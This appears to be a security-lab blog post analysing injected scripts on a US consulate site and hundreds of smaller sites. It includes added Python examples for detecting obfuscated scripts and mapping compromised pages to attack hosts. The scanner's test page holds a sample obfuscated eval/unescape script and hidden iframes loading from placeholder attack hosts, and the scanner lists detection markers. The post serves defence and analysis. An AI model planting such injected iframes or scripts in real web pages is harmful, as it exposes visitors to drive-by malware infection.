Big fish caught in the net

A few days ago SophosLabs became aware of a malicious script detection (Mal/ObfJS-C) triggering on webpages of the U.S. Consulate General in St. Petersburg, Russia.

We immediately checked the site but could not reproduce the detection. However, we were able to retrieve a copy of the page from an internet cache. The page did indeed contain a malicious script at the start of the body content:


As you can see, the malicious script is heavily obfuscated, and further analysis was required in order to work out exactly what was going on. Feeding the data into one of our automation systems, we were able to see the purpose of the script – it attempts to write a malicious Iframe to the page:

This Iframe then tries to silently load further malicious code from a remote server.
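The two symptoms described above (an obfuscated inline script that decodes and writes content at runtime, and an iframe that is both hidden and points off-site) are the ones a page scanner can check for directly. The following is an added example, not SophosLabs' detection or the Mal/ObfJS-C signature; it scores inline scripts on a handful of obfuscation indicators and flags iframes that are sized to zero or styled invisible while loading from another host. The sample page and all hostnames in it are constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Indicators typical of injected, obfuscated scripts: a decode/eval chain and
# a runtime DOM write. Each marker present adds one point to the score.
OBFUSCATION_MARKERS = ("eval(", "unescape(", "String.fromCharCode", "document.write(")
# A long run of percent- or \x-escaped bytes is another strong indicator.
HEX_ESCAPE_RUN = re.compile(r"(%[0-9a-fA-F]{2}|\\x[0-9a-fA-F]{2}){8,}")

# Constructed sample page (hypothetical content, not the cached page from the post):
# a benign article with an obfuscated script at the top of the body and a hidden
# off-site iframe at the bottom. The escaped string decodes to "document.write".
SAMPLE_HTML = """<html><body>
<script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65' + '("<iframe src=\\'http://attack-a.invalid/in.php\\' width=0 height=0>")'))</script>
<h1>Welcome</h1>
<script src="/js/menu.js"></script>
<script>var counter = 1;</script>
<iframe src="https://video.example.net/embed/abc" width="560" height="315"></iframe>
<iframe src="http://attack-b.invalid/x.php" width="0" height="0" style="display:none"></iframe>
</body></html>"""


class PageCollector(HTMLParser):
    """Collects inline script bodies and iframe attributes from a page."""

    def __init__(self):
        super().__init__()
        self.scripts = []   # inline script source strings
        self.iframes = []   # one attribute dict per <iframe>
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self._buf = []
        elif tag == "iframe":
            self.iframes.append({k: (v or "") for k, v in attrs})

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
            body = "".join(self._buf).strip()
            if body:
                self.scripts.append(body)


def script_score(src):
    """Number of obfuscation indicators found in an inline script."""
    score = sum(1 for marker in OBFUSCATION_MARKERS if marker in src)
    if HEX_ESCAPE_RUN.search(src):
        score += 1
    return score


def is_hidden_offsite_iframe(attrs, page_host):
    """True when the iframe loads from another host and is sized/styled invisible."""
    src_host = urlparse(attrs.get("src", "")).hostname or page_host
    offsite = src_host.lower() != page_host.lower()
    style = attrs.get("style", "").replace(" ", "").lower()
    hidden = (
        attrs.get("width", "") in ("0", "1")
        or attrs.get("height", "") in ("0", "1")
        or "display:none" in style
        or "visibility:hidden" in style
    )
    return offsite and hidden


def scan_page(html, page_host, threshold=2):
    """Return the inline scripts and iframe sources worth an analyst's attention."""
    collector = PageCollector()
    collector.feed(html)
    collector.close()
    return {
        "suspicious_scripts": [s for s in collector.scripts if script_score(s) >= threshold],
        "suspicious_iframes": [
            a.get("src", "") for a in collector.iframes
            if is_hidden_offsite_iframe(a, page_host)
        ],
    }


if __name__ == "__main__":
    for kind, hits in scan_page(SAMPLE_HTML, "www.example.com").items():
        print(kind, len(hits))
        for hit in hits:
            print("   ", hit[:80])
```

The score threshold is deliberately low because an injected script of this kind almost always carries several indicators at once, whereas legitimate minified code rarely combines `eval` with `unescape` and a long escape run; a zero-sized off-site iframe has no ordinary reason to exist on a content page. Both checks are cheap enough to run over a cached copy of a page when, as here, the live site no longer reproduces the detection.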

So, was this a targeted attack? Had someone specifically hacked this high profile site? Such questions are hard, and often impossible, to answer. However, as described in a previous blog entry, our web analysis automation system can often give us more insight into attacks, helping us to see the bigger picture. When querying data from the past week we found over 400 related webpages:



For clarity, the bulk of the related pages are not plotted on the flowchart. Nonetheless, it quickly gives us useful information about the attack:

  1. You can see a large group of nodes on the left hand side. Each node represents a compromised web page. The node highlighted in yellow is the U.S. Consulate General site.
  2. These nodes link to just two different nodes. These two nodes represent the two malicious attack sites.
  3. Each attack site uses a variety of exploits to install a Trojan.

You will notice the U.S. Consulate General site links to both attack sites. Rechecking the cached page confirms the page is compromised with two malicious additions. In addition to the Mal/ObfJS-C script, there is an additional malicious Iframe at the bottom of the page:

The top of the flowchart shows the attack site linked via this Iframe. The attack site linked via the Mal/ObfJS-C script is at the bottom.
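The flowchart reasoning above (many compromised pages fanning in to a small number of attack sites, with one page linked to both) is a graph question over "page loaded content from URL" records. The following is an added example, not the SophosLabs analysis system: it builds that bipartite graph from constructed records, ranks the attack hosts by how many distinct compromised sites point at them, and lists the sites that point at more than one attack host. All hostnames are placeholders.

```python
from collections import defaultdict
from urllib.parse import urlparse

# Constructed records: (compromised page, URL its injected content loads from).
# Placeholder hosts; none of these are the real sites discussed in the post.
RECORDS = [
    ("http://pizza.example.ru/index.html",      "http://attack-a.invalid/in.php"),
    ("http://motorsport.example.ru/news.html",  "http://attack-a.invalid/in.php"),
    ("http://big-fish.example/index.html",      "http://attack-a.invalid/in.php"),
    ("http://big-fish.example/index.html",      "http://attack-b.invalid/x.js"),
    ("http://blog.example.com/post.html",       "http://attack-b.invalid/x.js"),
    ("http://shop.example.ru/cart.html",        "http://attack-a.invalid/in.php"),
    ("http://shop.example.ru/checkout.html",    "http://attack-a.invalid/in.php"),
    # Same-site load: a page pulling its own script is not an edge of interest.
    ("http://shop.example.ru/cart.html",        "http://shop.example.ru/js/menu.js"),
]


def host_of(url):
    return (urlparse(url).hostname or "").lower()


def build_graph(records):
    """Map each off-site loaded host to the set of compromised site hosts linking to it."""
    graph = defaultdict(set)
    for page_url, loaded_url in records:
        page_host, loaded_host = host_of(page_url), host_of(loaded_url)
        if page_host and loaded_host and page_host != loaded_host:
            graph[loaded_host].add(page_host)
    return graph


def rank_attack_sites(graph, min_referrers=2):
    """Hosts pulled in by several unrelated sites, most-linked first.

    A single referrer is weak evidence; a host that many distinct compromised
    sites load from is the hub the flowchart makes visible.
    """
    ranked = [(host, len(pages)) for host, pages in graph.items() if len(pages) >= min_referrers]
    return sorted(ranked, key=lambda item: (-item[1], item[0]))


def sites_linking_multiple(graph, min_sites=2):
    """Compromised sites that point at more than one attack host."""
    per_site = defaultdict(set)
    for attack_host, pages in graph.items():
        for page_host in pages:
            per_site[page_host].add(attack_host)
    return sorted(site for site, hosts in per_site.items() if len(hosts) >= min_sites)


if __name__ == "__main__":
    g = build_graph(RECORDS)
    print("attack sites by distinct referring sites:")
    for host, count in rank_attack_sites(g):
        print(f"  {host}: {count}")
    print("sites linked to more than one attack site:", sites_linking_multiple(g))
```

Counting distinct referring hosts rather than raw page hits is what keeps one large site with many infected pages from dominating the ranking, and it is also what lets the "big fish" stand out: it is simply the one node with edges to both hubs.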

Attack 1 (top of flowchart)

  • A handful of pages, hosted on sites in the US and Russia, have all been compromised with the addition of a malicious script (proactively detected as Mal/ObfJS-C).
  • Malicious script content (proactively detected as JS/Doad-E) is loaded from a site hosted in the US.
  • This script attempts to exploit several browser vulnerabilities in order to install a Trojan (proactively detected as Mal/Packer) on the victim machine.

Attack 2 (bottom of flowchart)

  • A large number of pages on sites hosted in several different countries have been compromised with a malicious script (proactively detected as Mal/ObfJS-C). The compromised sites are mostly quite small and cover a diverse range of topics, from pizza delivery to motor sport. Most are Russian.
  • The script writes an Iframe to the page in order to silently load malicious content from an attack site hosted in the US. The malicious script at this attack site is proactively detected by Sophos as Troj/Mulex-A.
  • This script attempts to exploit several browser vulnerabilities in order to install a Trojan (proactively detected as Mal/Behav-119).

The purpose of the attacks is to infect victims with Trojans from the two attack sites. As discussed in a recent paper, the increased use of automation to continually re-encrypt/pack/obfuscate the Trojans highlights the need for good generic detection technology. A system to continuously monitor these files in order to maintain detection is essential.

So, to answer the question of whether the U.S. Consulate General site was specifically targeted in this attack – my answer is no, probably not. The prevalence of other much smaller sites compromised in exactly the same way (in just seven days' worth of data) suggests that the hackers just happened to have caught a big fish as they trawled for vulnerable servers. It just goes to show that security is important on all machines hosting both small and large websites.

Thankfully, the U.S. Consulate General site was cleaned up quickly, something which is sadly not the case for a lot of the smaller compromised sites we have seen.